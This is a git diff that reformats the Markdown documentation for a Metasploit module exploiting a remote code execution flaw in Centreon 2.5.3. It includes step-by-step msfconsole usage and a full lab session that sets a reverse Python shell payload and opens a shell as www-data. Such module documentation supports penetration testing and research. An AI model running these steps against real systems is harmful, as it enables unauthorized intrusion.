fixed markdown
parent
ebde552982
commit
a3b08418b9
|
@ -1,7 +1,7 @@
|
|||
## Vulnerable Application
|
||||
|
||||
[Exploit-db](https://www.exploit-db.com/apps/bf269a17dd99215e6dc5d7755b521c21-centreon-2.5.3.tar.gz)
|
||||
Archived Copy: [github](https://github.com/h00die/MSF-Testing-Scripts)
|
||||
1. [Exploit-db](https://www.exploit-db.com/apps/bf269a17dd99215e6dc5d7755b521c21-centreon-2.5.3.tar.gz)
|
||||
2. Archived Copy: [github](https://github.com/h00die/MSF-Testing-Scripts)
|
||||
|
||||
### Creating A Testing Environment
|
||||
|
||||
|
@ -21,49 +21,35 @@ Creating a testing environment for this application contained many steps, so I f
|
|||
|
||||
1. Install the application
|
||||
2. Start msfconsole
|
||||
3. Do: ```use exploit/linux/http/centreon_useralias_exec```
|
||||
4. Do: ```set payload```
|
||||
5. Do: ```set rhost```
|
||||
6. Do: ```check```
|
||||
```
|
||||
[+] Version Detected: 2.5.3
|
||||
[*] 192.168.2.85:80 The target appears to be vulnerable.
|
||||
```
|
||||
3. Do: `use exploit/linux/http/centreon_useralias_exec`
|
||||
4. Do: `set payload`
|
||||
5. Do: `set rhost`
|
||||
6. Do: `check`
|
||||
7. Do: ```run```
|
||||
8. You should get a shell.
|
||||
```
|
||||
[*] Started reverse TCP handler on 192.168.2.229:4444
|
||||
[*] Sending malicious login
|
||||
[*] Command shell session 1 opened (192.168.2.229:4444 -> 192.168.2.85:36792) at 2016-06-11 20:44:57 -0400
|
||||
whoami
|
||||
www-data
|
||||
uname -a
|
||||
Linux centreon 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
|
||||
```
|
||||
|
||||
## Scenarios
|
||||
|
||||
Just a standard run.
|
||||
Just a standard run.
|
||||
|
||||
```
|
||||
msf > use exploit/linux/http/centreon_useralias_exec
|
||||
msf exploit(centreon_useralias_exec) > set payload cmd/unix/reverse_python
|
||||
payload => cmd/unix/reverse_python
|
||||
msf exploit(centreon_useralias_exec) > set lhost 192.168.2.229
|
||||
lhost => 192.168.2.229
|
||||
msf exploit(centreon_useralias_exec) > set rhost 192.168.2.85
|
||||
rhost => 192.168.2.85
|
||||
msf exploit(centreon_useralias_exec) > set verbose true
|
||||
verbose => true
|
||||
msf exploit(centreon_useralias_exec) > check
|
||||
[+] Version Detected: 2.5.3
|
||||
[*] 192.168.2.85:80 The target appears to be vulnerable.
|
||||
msf exploit(centreon_useralias_exec) > exploit
|
||||
[*] Started reverse TCP handler on 192.168.2.229:4444
|
||||
[*] Sending malicious login
|
||||
[*] Command shell session 1 opened (192.168.2.229:4444 -> 192.168.2.85:36792) at 2016-06-11 20:44:57 -0400
|
||||
whoami
|
||||
www-data
|
||||
uname -a
|
||||
Linux centreon 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
|
||||
```
|
||||
msf > use exploit/linux/http/centreon_useralias_exec
|
||||
msf exploit(centreon_useralias_exec) > set payload cmd/unix/reverse_python
|
||||
payload => cmd/unix/reverse_python
|
||||
msf exploit(centreon_useralias_exec) > set lhost 192.168.2.229
|
||||
lhost => 192.168.2.229
|
||||
msf exploit(centreon_useralias_exec) > set rhost 192.168.2.85
|
||||
rhost => 192.168.2.85
|
||||
msf exploit(centreon_useralias_exec) > set verbose true
|
||||
verbose => true
|
||||
msf exploit(centreon_useralias_exec) > check
|
||||
[+] Version Detected: 2.5.3
|
||||
[*] 192.168.2.85:80 The target appears to be vulnerable.
|
||||
msf exploit(centreon_useralias_exec) > exploit
|
||||
[*] Started reverse TCP handler on 192.168.2.229:4444
|
||||
[*] Sending malicious login
|
||||
[*] Command shell session 1 opened (192.168.2.229:4444 -> 192.168.2.85:36792) at 2016-06-11 20:44:57 -0400
|
||||
whoami
|
||||
www-data
|
||||
uname -a
|
||||
Linux centreon 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
|
||||
|
Loading…
Reference in New Issue